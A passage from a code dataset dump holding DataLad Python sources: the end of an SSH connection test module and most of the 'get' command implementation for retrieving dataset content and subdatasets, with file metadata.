bad\")\n\n @property\n def ctrl_path(self):\n with open(bogus_socket, \"w\") as f:\n f.write(\"whatever\")\n return Path(bogus_socket)\n\n # since we are digging into protected area - should also set _prev_connections\n manager._prev_connections = {}\n manager._connections['bogus'] = bogus()\n assert_raises(Exception, manager.close)\n assert_raises(Exception, manager.close)\n\n # but should proceed just fine if allow_fail=False\n with swallow_logs(new_level=logging.DEBUG) as cml:\n manager.close(allow_fail=False)\n assert_in('Failed to close a connection: oh I am so bad', cml.out)\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(content='one')\n@with_tempfile(content='two')\ndef test_ssh_copy(sourcedir=None, sourcefile1=None, sourcefile2=None):\n port = get_ssh_port('datalad-test')\n remote_url = 'ssh://datalad-test:{}'.format(port)\n manager = SSHManager()\n ssh = manager.get_connection(remote_url)\n\n # copy content of sourcefile3 to an obscurely named file in sourcedir\n obscure_file = get_most_obscure_supported_name()\n obscure_path = opj(sourcedir, obscure_file)\n with open(obscure_path, 'w') as f:\n f.write('three')\n\n # copy first two temp files to remote_url:sourcedir\n sourcefiles = [sourcefile1, sourcefile2]\n ssh.put(sourcefiles, opj(remote_url, sourcedir))\n # copy obscure file to remote_url:sourcedir/'<obscure_file_name>.c opy'\n # we copy to a different name because the test setup maps local dir and\n # remote dir to the same directory on the test machine. That means the file\n # is copied onto itself. 
With ssh version 9 this leads to an empty file.\n # We perform copy instead of just writing the content to the destination\n # file, because ww want to ensure that the source file is picked up by\n # 'ssh.put()'.\n ssh.put([obscure_path], opj(remote_url, sourcedir, obscure_file + '.c opy'))\n\n # docs promise that connection is auto-opened in case of multiplex\n if _ssh_manager_is_multiplex:\n ok_(ssh.is_open())\n\n # recursive copy tempdir to remote_url:targetdir\n targetdir = sourcedir + '.c opy'\n ssh.put(sourcedir, opj(remote_url, targetdir),\n recursive=True, preserve_attrs=True)\n\n # check if sourcedir copied to remote_url:targetdir\n ok_(isdir(targetdir))\n # check if scp preserved source directory attributes\n # if source_mtime=1.12s, scp -p sets target_mtime = 1.0s, test that\n eq_(getmtime(targetdir), int(getmtime(sourcedir)) + 0.0)\n\n # check if targetfiles(and its content) exist in remote_url:targetdir,\n # this implies file(s) and recursive directory copying pass\n for targetfile, content in zip(sourcefiles + [obscure_file + '.c opy'],\n ['one', 'two', 'three']):\n targetpath = opj(targetdir, targetfile)\n ok_(exists(targetpath))\n with open(targetpath, 'r') as fp:\n eq_(content, fp.read())\n\n # and now a quick smoke test for get\n # but simplify the most obscure filename slightly to not trip `scp` itself\n togetfile = Path(targetdir) / (obscure_file.replace('`', '') + '2')\n togetfile.write_text(str('something'))\n ssh.get(opj(remote_url, str(togetfile)), sourcedir)\n ok_((Path(sourcedir) / togetfile.name).exists())\n\n ssh.close()\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_compound_cmds():\n ssh = SSHManager().get_connection('ssh://datalad-test')\n out, err = ssh('[ 1 = 2 ] && echo no || echo success')\n eq_(out.strip(), 'success')\n ssh.close() # so we get rid of the possibly lingering connections\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_custom_identity_file():\n ifile = \"/tmp/dl-test-ssh-id\" # Travis\n if not op.exists(ifile):\n raise SkipTest(\"Travis-specific '{}' identity file does not exist\"\n .format(ifile))\n\n with patch_config({\"datalad.ssh.identityfile\": ifile}):\n with swallow_logs(new_level=logging.DEBUG) as cml:\n manager = SSHManager()\n ssh = manager.get_connection('ssh://datalad-test')\n cmd_out, _ = ssh(\"echo blah\")\n if _ssh_manager_is_multiplex:\n expected_socket = op.join(\n str(manager.socket_dir),\n get_connection_hash(\"datalad-test\", identity_file=ifile))\n ok_(exists(expected_socket))\n manager.close()\n assert_in(\"-i\", cml.out)\n assert_in(ifile, cml.out)\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_git_props():\n remote_url = 'ssh://datalad-test'\n manager = SSHManager()\n ssh = manager.get_connection(remote_url)\n # Note: Avoid comparing these versions directly to the versions in\n # external_versions because the ssh://localhost versions detected might\n # differ depending on how git-annex is installed.\n ok_(ssh.get_annex_version())\n ok_(ssh.get_git_version())\n manager.close() # close possibly still present connections\n\n\n# situation on our test windows boxes is complicated\n# login shell is a POSIX one, path handling and equivalence between\n# local and \"remote\" needs more research\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(mkdir=True)\ndef test_bundle_invariance(path=None):\n remote_url = 'ssh://datalad-test'\n manager = SSHManager()\n testfile = Path(path) / 'dummy'\n for flag in (True, False):\n assert_false(testfile.exists())\n ssh = manager.get_connection(remote_url, 
use_remote_annex_bundle=flag)\n ssh('cd .>{}'.format(str(testfile)))\n ok_(testfile.exists())\n testfile.unlink()\n" }, { "alpha_fraction": 0.5767908096313477, "alphanum_fraction": 0.5788007974624634, "avg_line_length": 39.56385040283203, "blob_id": "48f64b2ce0f027026674c15577b0d6a86aefa396", "content_id": "a5a927548a3a5ba973a3f6d91890aff9773ed436", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41294, "license_type": "permissive", "max_line_length": 109, "num_lines": 1018, "path": "/datalad/distribution/get.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for getting dataset content\n\n\"\"\"\n\nimport logging\nimport re\n\nimport os.path as op\n\nfrom datalad.config import ConfigManager\nfrom datalad.interface.base import (\n Interface,\n eval_results,\n)\nfrom datalad.interface.base import build_doc\nfrom datalad.interface.results import (\n get_status_dict,\n results_from_paths,\n annexjson2result,\n success_status_map,\n results_from_annex_noinfo,\n)\nfrom datalad.interface.common_opts import (\n recursion_flag,\n location_description,\n jobs_opt,\n reckless_opt,\n)\nfrom datalad.interface.results import is_ok_dataset\nfrom datalad.support.constraints import (\n EnsureInt,\n EnsureChoice,\n EnsureStr,\n EnsureNone,\n)\nfrom datalad.support.collections import ReadOnlyDict\nfrom datalad.support.param import Parameter\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import (\n GitRepo,\n _fixup_submodule_dotgit_setup,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.network import (\n URL,\n RI,\n urlquote,\n)\nfrom datalad.support.parallel import (\n ProducerConsumerProgressLog,\n)\nfrom datalad.utils import (\n unique,\n Path,\n get_dataset_root,\n shortened_repr,\n)\n\nfrom datalad.local.subdatasets import Subdatasets\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.core.distributed.clone import clone_dataset\nfrom datalad.distribution.utils import _get_flexible_source_candidates\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.distribution.get')\n\n\ndef _get_remotes_having_commit(repo, commit_hexsha, with_urls_only=True):\n \"\"\"Traverse all branches of the remote and check if commit in any of their ancestry\n\n It is a generator yielding names of the remotes\n \"\"\"\n remote_branches = [\n b['refname:strip=2']\n for b in repo.for_each_ref_(\n fields='refname:strip=2',\n pattern='refs/remotes',\n contains=commit_hexsha)]\n return [\n remote\n for remote in repo.get_remotes(with_urls_only=with_urls_only)\n if any(rb.startswith(remote + '/') for rb in remote_branches)\n ]\n\n\ndef _get_flexible_source_candidates_for_submodule(ds, sm):\n \"\"\"Assemble candidate locations from where to clone a submodule\n\n The following location candidates are considered. 
For each candidate a\n cost is given in parenthesis, higher values indicate higher cost, and\n thus lower priority:\n\n - A datalad URL recorded in `.gitmodules` (cost 590). This allows for\n datalad URLs that require additional handling/resolution by datalad, like\n ria-schemes (ria+http, ria+ssh, etc.)\n\n - A URL or absolute path recorded for git in `.gitmodules` (cost 600).\n\n - URL of any configured superdataset remote that is known to have the\n desired submodule commit, with the submodule path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path instead of a URL,\n the URL of any configured superdataset remote that is known to have the\n desired submodule commit, with this relative path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path as a URL, the absolute\n path of the superdataset, appended with this relative path (cost 900).\n\n Additional candidate URLs can be generated based on templates specified as\n configuration variables with the pattern\n\n `datalad.get.subdataset-source-candidate-<name>`\n\n where `name` is an arbitrary identifier. If name starts with three digits\n (e.g. '400myserver') these will be interpreted as a cost, and the\n respective candidate will be sorted into the generated candidate list\n according to this cost. If no cost is given, a default of 700\n is used.\n\n A template string assigned to such a variable can utilize the Python format\n mini language and may reference a number of properties that are inferred\n from the parent dataset's knowledge about the target subdataset. Properties\n include any submodule property specified in the respective `.gitmodules`\n record. For convenience, an existing `datalad-id` record is made available\n under the shortened name `id`.\n\n Additionally, the URL of any configured remote that contains the respective\n submodule commit is available as `remoteurl-<name>` property, where `name`\n is the configured remote name.\n\n Lastly, all candidates are sorted according to their cost (lower values\n first), and duplicate URLs are stripped, while preserving the first item in the\n candidate list.\n\n More information on this feature can be found at\n http://handbook.datalad.org/r.html?clone-priority\n\n Parameters\n ----------\n ds : Dataset\n Parent dataset of to-be-installed subdataset.\n sm : dict\n Submodule record as produced by `subdatasets()`.\n\n Returns\n -------\n list of dict\n Where each dict has keys 'cost' (int), 'name' (str), 'url' (str).\n Names are not unique and either derived from the name of the respective\n remote, template configuration variable, or 'local'.\n \"\"\"\n\n # short cuts\n ds_repo = ds.repo\n sm_url = sm.get('gitmodule_url', None)\n sm_datalad_url = sm.get('gitmodule_datalad-url', None)\n sm_path = op.relpath(sm['path'], start=sm['parentds'])\n\n clone_urls = []\n\n # CANDIDATE: tracking remote of the current branch\n tracking_remote, tracking_branch = ds_repo.get_tracking_branch()\n candidate_remotes = [tracking_remote] if tracking_remote else []\n\n # if we have a remote, let's check the location of that remote\n # for the presence of the desired submodule\n last_commit = ds_repo.get_last_commit_hexsha(sm_path)\n if last_commit:\n # CANDIDATE: any remote that has the commit when the submodule was\n # last modified\n\n # ideally should also give preference to the remotes which have\n # the same branch checked out I guess\n candidate_remotes += 
list(_get_remotes_having_commit(ds_repo, last_commit))\n\n # prepare a dict to generate URL candidates from templates\n sm_candidate_props = {\n k[10:].replace('datalad-id', 'id'): v\n for k, v in sm.items()\n if k.startswith('gitmodule_')\n }\n\n for remote in unique(candidate_remotes):\n remote_url = ds_repo.get_remote_url(remote, push=False)\n\n # Directly on parent's ds url\n if remote_url:\n # make remotes and their URLs available to template rendering\n sm_candidate_props['remoteurl-{}'.format(remote)] = remote_url\n # attempt: submodule checkout at parent remote URL\n # We might need to quote sm_path portion, e.g. for spaces etc\n if isinstance(RI(remote_url), URL):\n sm_path_url = urlquote(sm_path)\n else:\n sm_path_url = sm_path\n\n clone_urls.extend(\n dict(cost=650, name=remote, url=url)\n for url in _get_flexible_source_candidates(\n # alternate suffixes are tested by `clone` anyways\n sm_path_url, remote_url, alternate_suffix=False)\n )\n\n # attempt: provided (configured?) submodule URL\n # TODO: consider supporting DataLadRI here? or would confuse\n # git and we wouldn't want that (i.e. not allow pure git clone\n # --recursive)\n if sm_url:\n clone_urls.extend(\n dict(cost=600, name=remote, url=url)\n for url in _get_flexible_source_candidates(\n sm_url,\n remote_url,\n alternate_suffix=False)\n )\n\n cost_candidate_expr = re.compile('[0-9][0-9][0-9].*')\n candcfg_prefix = 'datalad.get.subdataset-source-candidate-'\n for name, tmpl in [(c[len(candcfg_prefix):],\n ds_repo.config[c])\n for c in ds_repo.config.keys()\n if c.startswith(candcfg_prefix)]:\n # ensure that there is only one template of the same name\n if type(tmpl) == tuple and len(tmpl) > 1:\n raise ValueError(\n f\"There are multiple URL templates for submodule clone \"\n f\"candidate '{name}', but only one is allowed. \"\n f\"Check datalad.get.subdataset-source-candidate-* configuration!\"\n )\n try:\n url = tmpl.format(**sm_candidate_props)\n except KeyError as e:\n ce = CapturedException(e)\n lgr.warning(\n \"Failed to format template %r for a submodule clone. \"\n \"Error: %s\", tmpl, ce\n )\n continue\n # we don't want \"flexible_source_candidates\" here, this is\n # configuration that can be made arbitrarily precise from the\n # outside. 
Additional guesswork can only make it slower\n has_cost = cost_candidate_expr.match(name) is not None\n clone_urls.append(\n # assign a default cost, if a config doesn't have one\n dict(\n cost=int(name[:3]) if has_cost else 700,\n name=name[3:] if has_cost else name,\n url=url,\n from_config=True,\n ))\n\n # CANDIDATE: the actual configured gitmodule URL\n if sm_url:\n clone_urls.extend(\n dict(cost=900, name='local', url=url)\n for url in _get_flexible_source_candidates(\n sm_url,\n ds.path,\n alternate_suffix=False)\n # avoid inclusion of submodule location itself\n if url != sm['path']\n )\n\n # Consider original datalad URL in .gitmodules before any URL that is meant\n # to be consumed by git:\n if sm_datalad_url:\n clone_urls.append(\n dict(cost=590, name='dl-url', url=sm_datalad_url)\n )\n\n # sort all candidates by their label, thereby allowing a\n # candidate provided by configuration to purposefully\n # sort before or after automatically generated configuration\n clone_urls = sorted(clone_urls, key=lambda x: x['cost'])\n # take out any duplicate source candidates\n # unique() takes out the duplicated at the tail end\n clone_urls = unique(clone_urls, lambda x: x['url'])\n lgr.debug('Assembled %i clone candidates for %s: %s',\n len(clone_urls), sm_path, [cand['url'] for cand in clone_urls])\n\n return clone_urls\n\n\ndef _install_subds_from_flexible_source(ds, sm, **kwargs):\n \"\"\"Tries to obtain a given subdataset from several meaningful locations\n\n Parameters\n ----------\n ds : Dataset\n Parent dataset of to-be-installed subdataset.\n sm : dict\n Submodule record as produced by `subdatasets()`.\n **kwargs\n Passed onto clone()\n \"\"\"\n sm_path = op.relpath(sm['path'], start=sm['parentds'])\n # compose a list of candidate clone URLs\n clone_urls = _get_flexible_source_candidates_for_submodule(ds, sm)\n\n # prevent inevitable exception from `clone`\n dest_path = op.join(ds.path, sm_path)\n clone_urls_ = [src['url'] for src in clone_urls if src['url'] != dest_path]\n\n if not clone_urls:\n # yield error\n yield get_status_dict(\n action='install',\n ds=ds,\n status='error',\n message=(\n \"Have got no candidates to install subdataset %s from.\",\n sm_path),\n logger=lgr,\n )\n return\n\n for res in clone_dataset(\n clone_urls_,\n Dataset(dest_path),\n cfg=ds.config,\n checkout_gitsha=sm['gitshasum'],\n **kwargs):\n if res.get('action', None) == 'install' and \\\n res.get('status', None) == 'ok' and \\\n res.get('type', None) == 'dataset' and \\\n res.get('path', None) == dest_path:\n _fixup_submodule_dotgit_setup(ds, sm_path)\n\n section_name = 'submodule.{}'.format(sm['gitmodule_name'])\n # register the submodule as \"active\" in the superdataset\n ds.config.set(\n '{}.active'.format(section_name),\n 'true',\n reload=False, force=True, scope='local',\n )\n ds.config.set(\n '{}.url'.format(section_name),\n # record the actual source URL of the successful clone\n # and not a funky prediction based on the parent ds\n # like ds.repo.update_submodule() would do (does not\n # accept a URL)\n res['source']['giturl'],\n reload=True, force=True, scope='local',\n )\n yield res\n\n subds = Dataset(dest_path)\n if not subds.is_installed():\n lgr.debug('Desired subdataset %s did not materialize, stopping', subds)\n return\n\n # check whether clone URL generators were involved\n cand_cfg = [rec for rec in clone_urls if rec.get('from_config', False)]\n if cand_cfg:\n # get a handle on the configuration that is specified in the\n # dataset itself (local and dataset)\n super_cfg = 
ConfigManager(dataset=ds, source='branch-local')\n need_reload = False\n for rec in cand_cfg:\n # check whether any of this configuration originated from the\n # superdataset. if so, inherit the config in the new subdataset\n # clone unless that config is already specified in the new\n # subdataset which can happen during postclone_cfg routines.\n # if not, keep things clean in order to be able to move with any\n # outside configuration change\n for c in ('datalad.get.subdataset-source-candidate-{}{}'.format(\n rec['cost'], rec['name']),\n 'datalad.get.subdataset-source-candidate-{}'.format(\n rec['name'])):\n if c in super_cfg.keys() and c not in subds.config.keys():\n subds.config.set(c, super_cfg.get(c), scope='local',\n reload=False)\n need_reload = True\n break\n if need_reload:\n subds.config.reload(force=True)\n\n\ndef _install_necessary_subdatasets(\n ds, path, reckless, refds_path, description=None):\n \"\"\"Installs subdatasets of `ds`, that are necessary to obtain in order\n to have access to `path`.\n\n Gets the subdataset containing `path` regardless of whether or not it was\n already installed. While doing so, installs everything necessary in between\n the uppermost installed one and `path`.\n\n Note: `ds` itself has to be installed.\n\n Parameters\n ----------\n ds: Dataset\n path: str\n reckless: bool\n \"\"\"\n # figuring out what dataset to start with, --contains limits --recursive\n # to visit only subdataset on the trajectory to the target path\n subds_trail = ds.subdatasets(contains=path, recursive=True,\n on_failure=\"ignore\",\n result_filter=is_ok_dataset,\n result_renderer='disabled')\n if not subds_trail:\n # there is not a single known subdataset (installed or not)\n # for this path -- job done\n return\n # otherwise we start with the one deepest down\n cur_subds = subds_trail[-1]\n\n while not GitRepo.is_valid_repo(cur_subds['path']):\n # install using helper that give some flexibility regarding where to\n # get the module from\n for res in _install_subds_from_flexible_source(\n Dataset(cur_subds['parentds']),\n cur_subds,\n reckless=reckless,\n description=description):\n if res.get('action', None) == 'install':\n if res['status'] == 'ok':\n # report installation, whether it helped or not\n res['message'] = (\n \"Installed subdataset in order to get %s\",\n str(path))\n # next subdataset candidate\n sd = Dataset(res['path'])\n yield res\n elif res['status'] in ('impossible', 'error'):\n yield res\n # we cannot go deeper, we need to stop\n return\n else:\n # report unconditionally to caller\n yield res\n if sd.pathobj == path:\n # we've just got the target subdataset, we're done\n return\n # now check whether the just installed subds brought us any closer to\n # the target path\n subds_trail = sd.subdatasets(contains=path, recursive=False,\n on_failure='ignore',\n result_filter=is_ok_dataset,\n result_renderer='disabled')\n if not subds_trail:\n # no (newly available) subdataset gets us any closer\n return\n # next round\n cur_subds = subds_trail[-1]\n\n\ndef _recursive_install_subds_underneath(ds, recursion_limit, reckless, start=None,\n refds_path=None, description=None, jobs=None, producer_only=False):\n if isinstance(recursion_limit, int) and recursion_limit <= 0:\n return\n # install using helper that give some flexibility regarding where to\n # get the module from\n\n # Keep only paths, to not drag full instances of Datasets along,\n # they are cheap to instantiate\n sub_paths_considered = []\n subs_notneeded = []\n\n def gen_subs_to_install(): # 
producer\n for sub in ds.subdatasets(\n path=start,\n return_type='generator',\n result_renderer='disabled'):\n sub_path = sub['path']\n sub_paths_considered.append(sub_path)\n if sub.get('gitmodule_datalad-recursiveinstall', '') == 'skip':\n lgr.debug(\n \"subdataset %s is configured to be skipped on recursive installation\",\n sub_path)\n continue\n # TODO: Yarik is lost among all parentds, ds, start, refds_path so is not brave enough to\n # assume any from the record, thus will pass \"ds.path\" around to consumer\n yield ds.path, ReadOnlyDict(sub), recursion_limit\n\n def consumer(ds_path__sub__limit):\n ds_path, sub, recursion_limit = ds_path__sub__limit\n subds = Dataset(sub['path'])\n if sub.get('state', None) != 'absent':\n rec = get_status_dict('install', ds=subds, status='notneeded', logger=lgr, refds=refds_path)\n subs_notneeded.append(rec)\n yield rec\n # do not continue, even if an intermediate dataset exists it\n # does not imply that everything below it does too\n else:\n # TODO: here we need another \"ds\"! is it within \"sub\"?\n yield from _install_subds_from_flexible_source(\n Dataset(ds_path), sub, reckless=reckless, description=description)\n\n if not subds.is_installed():\n # an error result was emitted, and the external consumer can decide\n # what to do with it, but there is no point in recursing into\n # something that should be there, but isn't\n lgr.debug('Subdataset %s could not be installed, skipped', subds)\n return\n\n # recurse\n # we can skip the start expression, we know we are within\n for res in _recursive_install_subds_underneath(\n subds,\n recursion_limit=recursion_limit - 1 if isinstance(recursion_limit, int) else recursion_limit,\n reckless=reckless,\n refds_path=refds_path,\n jobs=jobs,\n producer_only=True # we will be adding to producer queue\n ):\n producer_consumer.add_to_producer_queue(res)\n\n producer = gen_subs_to_install()\n if producer_only:\n yield from producer\n else:\n producer_consumer = ProducerConsumerProgressLog(\n producer,\n consumer,\n # no safe_to_consume= is needed since we are doing only at a single level ATM\n label=\"Installing\",\n unit=\"datasets\",\n jobs=jobs,\n lgr=lgr\n )\n yield from producer_consumer\n\n\ndef _install_targetpath(\n ds,\n target_path,\n recursive,\n recursion_limit,\n reckless,\n refds_path,\n description,\n jobs=None,\n):\n \"\"\"Helper to install as many subdatasets as needed to verify existence\n of a target path\n\n Parameters\n ==========\n ds : Dataset\n Locally available dataset that contains the target path\n target_path : Path\n \"\"\"\n # if it is an empty dir, it could still be a subdataset that is missing\n if (target_path.is_dir() and any(target_path.iterdir())) or \\\n (not target_path.is_dir()\n and (target_path.is_symlink() or target_path.exists())):\n yield dict(\n action='get',\n type='dataset',\n # this cannot just be the dataset path, as the original\n # situation of datasets avail on disk can have changed due\n # to subdataset installation. It has to be actual subdataset\n # it resides in, because this value is used to determine which\n # dataset to call `annex-get` on\n # TODO stringification is a PY35 compatibility kludge\n path=get_dataset_root(str(target_path)),\n status='notneeded',\n contains=[target_path],\n refds=refds_path,\n )\n else:\n # we don't have it yet. 
is it in a subdataset?\n for res in _install_necessary_subdatasets(\n ds, target_path, reckless, refds_path, description=description):\n if (target_path.is_symlink() or target_path.exists()):\n # this dataset brought the path, mark for annex\n # processing outside\n res['contains'] = [target_path]\n # just spit it out\n yield res\n if not (target_path.is_symlink() or target_path.exists()):\n # looking for subdatasets did not help -> all hope is lost\n yield dict(\n action='get',\n path=str(target_path),\n status='impossible',\n refds=refds_path,\n message='path does not exist',\n )\n return\n # we have the target path\n if not (recursive\n #and not recursion_limit == 'existing' \\\n and target_path.is_dir()):\n # obtain any subdatasets underneath the paths given\n # a non-directory cannot have content underneath\n return\n if recursion_limit == 'existing':\n for res in ds.subdatasets(\n state='present',\n path=target_path,\n recursive=recursive,\n recursion_limit=recursion_limit,\n return_type='generator',\n result_renderer='disabled'):\n res.update(\n contains=[Path(res['path'])],\n action='get',\n status='notneeded',\n )\n yield res\n return\n lgr.info(\n \"Ensuring presence of %s%s\",\n ds,\n (\" to get %s\" % target_path\n if ds.path != target_path\n else \"\"))\n for res in _recursive_install_subds_underneath(\n ds,\n # target_path was explicitly given as input\n # we count recursions from the input, hence we\n # can start with the full number\n recursion_limit,\n reckless,\n # TODO keep Path when RF is done\n start=str(target_path),\n refds_path=refds_path,\n description=description,\n jobs=jobs,\n ):\n # yield immediately so errors could be acted upon\n # outside, before we continue\n res.update(\n # do not override reported action, could be anything\n #action='get',\n contains=[Path(res['path'])],\n )\n yield res\n\n\ndef _get_targetpaths(ds, content, refds_path, source, jobs):\n # not ready for Path instances...\n content = [str(c) for c in content]\n # hand over to git-annex, get files content,\n # report files in git as 'notneeded' to get\n ds_repo = ds.repo\n # needs to be an annex to get content\n if not isinstance(ds_repo, AnnexRepo):\n for r in results_from_paths(\n content, status='notneeded',\n message=\"no dataset annex, content already present\",\n action='get',\n type='file',\n logger=lgr,\n refds=refds_path):\n yield r\n return\n respath_by_status = {}\n try:\n results = ds_repo.get(\n content,\n options=['--from=%s' % source] if source else [],\n jobs=jobs)\n except CommandError as exc:\n results = exc.kwargs.get(\"stdout_json\")\n if not results:\n raise\n\n for res in results:\n res = annexjson2result(res, ds, type='file', logger=lgr,\n refds=refds_path)\n success = success_status_map[res['status']]\n # TODO: in case of some failed commands (e.g. get) there might\n # be no path in the record. 
yoh has only vague idea of logic\n # here so just checks for having 'path', but according to\n # results_from_annex_noinfo, then it would be assumed that\n # `content` was acquired successfully, which is not the case\n if 'path' in res:\n respath_by_status[success] = \\\n respath_by_status.get(success, []) + [res['path']]\n yield res\n\n for r in results_from_annex_noinfo(\n ds,\n content,\n respath_by_status,\n dir_fail_msg='could not get some content in %s %s',\n noinfo_dir_msg='nothing to get from %s',\n noinfo_file_msg='already present',\n action='get',\n logger=lgr,\n refds=refds_path):\n yield r\n\n\ndef _check_error_reported_before(res: dict, error_dict: dict):\n # Helper to check if an impossible result for a path that does\n # not exist has already been yielded before. If not, add path\n # to the error_dict.\n if res.get('action', None) == 'get' and \\\n res.get('status', None) == 'impossible' and \\\n res.get('message', None) == 'path does not exist':\n non_existing_path = res.get('path', None)\n if non_existing_path not in error_dict.keys():\n # if path not in dict, add it\n error_dict[non_existing_path] = True\n return False\n else:\n return True\n return False\n\n\n@build_doc\nclass Get(Interface):\n \"\"\"Get any dataset content (files/directories/subdatasets).\n\n This command only operates on dataset content. To obtain a new independent\n dataset from some source use the `clone` command.\n\n By default this command operates recursively within a dataset, but not\n across potential subdatasets, i.e. if a directory is provided, all files in\n the directory are obtained. Recursion into subdatasets is supported too. If\n enabled, relevant subdatasets are detected and installed in order to\n fulfill a request.\n\n Known data locations for each requested file are evaluated and data are\n obtained from some available location (according to git-annex configuration\n and possibly assigned remote priorities), unless a specific source is\n specified.\n\n *Getting subdatasets*\n\n Just as DataLad supports getting file content from more than one location,\n the same is supported for subdatasets, including a ranking of individual\n sources for prioritization.\n\n The following location candidates are considered. For each candidate a\n cost is given in parenthesis, higher values indicate higher cost, and thus\n lower priority:\n\n - A datalad URL recorded in `.gitmodules` (cost 590). This allows for\n datalad URLs that require additional handling/resolution by datalad, like\n ria-schemes (ria+http, ria+ssh, etc.)\n\n - A URL or absolute path recorded for git in `.gitmodules` (cost 600).\n\n - URL of any configured superdataset remote that is known to have the\n desired submodule commit, with the submodule path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path instead of a URL,\n the URL of any configured superdataset remote that is known to have the\n desired submodule commit, with this relative path appended to it.\n There can be more than one candidate (cost 650).\n\n - In case `.gitmodules` contains a relative path as a URL, the absolute\n path of the superdataset, appended with this relative path (cost 900).\n\n Additional candidate URLs can be generated based on templates specified as\n configuration variables with the pattern\n\n `datalad.get.subdataset-source-candidate-<name>`\n\n where `name` is an arbitrary identifier. If `name` starts with three digits\n (e.g. 
'400myserver') these will be interpreted as a cost, and the\n respective candidate will be sorted into the generated candidate list\n according to this cost. If no cost is given, a default of 700 is used.\n\n A template string assigned to such a variable can utilize the Python format\n mini language and may reference a number of properties that are inferred\n from the parent dataset's knowledge about the target subdataset. Properties\n include any submodule property specified in the respective `.gitmodules`\n record. For convenience, an existing `datalad-id` record is made available\n under the shortened name `id`.\n\n Additionally, the URL of any configured remote that contains the respective\n submodule commit is available as `remoteurl-<name>` property, where `name`\n is the configured remote name.\n\n Hence, such a template could be `http://example.org/datasets/{id}` or\n `http://example.org/datasets/{path}`, where `{id}` and `{path}` would be\n replaced by the `datalad-id` or `path` entry in the `.gitmodules` record.\n\n If this config is committed in `.datalad/config`, a clone of a dataset can\n look up any subdataset's URL according to such scheme(s) irrespective of\n what URL is recorded in `.gitmodules`.\n\n Lastly, all candidates are sorted according to their cost (lower values\n first), and duplicate URLs are stripped, while preserving the first item in the\n candidate list.\n\n .. note::\n Power-user info: This command uses :command:`git annex get` to fulfill\n file handles.\n \"\"\"\n _examples_ = [\n dict(text=\"Get a single file\",\n code_py=\"get('path/to/file')\",\n code_cmd=\"datalad get <path/to/file>\"),\n dict(text=\"Get contents of a directory\",\n code_py=\"get('path/to/dir/')\",\n code_cmd=\"datalad get <path/to/dir/>\"),\n dict(text=\"Get all contents of the current dataset and its subdatasets\",\n code_py=\"get(dataset='.', recursive=True)\",\n code_cmd=\"datalad get . -r\"),\n dict(text=\"Get (clone) a registered subdataset, but don't retrieve data\",\n code_py=\"get('path/to/subds', get_data=False)\",\n code_cmd=\"datalad get -n <path/to/subds>\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"PATH\",\n doc=\"\"\"specify the dataset to perform the add operation on, in\n which case `path` arguments are interpreted as being relative\n to this dataset. If no dataset is given, an attempt is made to\n identify a dataset for each input `path`\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"\"\"path/name of the requested dataset component. The component\n must already be known to a dataset. 
To add new components to a\n dataset use the `add` command\"\"\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n source=Parameter(\n args=(\"-s\", \"--source\",),\n metavar=\"LABEL\",\n doc=\"\"\"label of the data source to be used to fulfill requests.\n This can be the name of a dataset :term:`sibling` or another known\n source\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=Parameter(\n args=(\"-R\", \"--recursion-limit\",),\n metavar=\"LEVELS\",\n constraints=EnsureInt() | EnsureChoice('existing') | EnsureNone(),\n doc=\"\"\"limit recursion into subdataset to the given number of levels.\n Alternatively, 'existing' will limit recursion to subdatasets that already\n existed on the filesystem at the start of processing, and prevent new\n subdatasets from being obtained recursively.\"\"\"),\n get_data=Parameter(\n args=(\"-n\", \"--no-data\",),\n dest='get_data',\n action='store_false',\n doc=\"\"\"whether to obtain data for all file handles. If disabled, `get`\n operations are limited to dataset handles.[CMD: This option prevents data\n for file handles from being obtained CMD]\"\"\"),\n description=location_description,\n reckless=reckless_opt,\n jobs=jobs_opt)\n\n @staticmethod\n @datasetmethod(name='get')\n @eval_results\n def __call__(\n path=None,\n *,\n source=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n get_data=True,\n description=None,\n reckless=None,\n jobs='auto',\n ):\n \n if not (dataset or path):\n raise InsufficientArgumentsError(\n \"Neither dataset nor target path(s) provided\")\n # we have to have a single dataset to operate on\n refds = require_dataset(\n dataset, check_installed=True, purpose='get content of %s' % shortened_repr(path))\n # some functions downstream expect a str\n refds_path = refds.path\n if dataset and not path:\n # act on the whole dataset if nothing else was specified\n path = refds_path\n\n # keep track of error results for paths that do not exist\n error_reported = {}\n content_by_ds = {}\n # use subdatasets() to discover any relevant content that is not\n # already present in the root dataset (refds)\n for sdsres in Subdatasets.__call__(\n contains=path,\n # maintain path argument semantics and pass 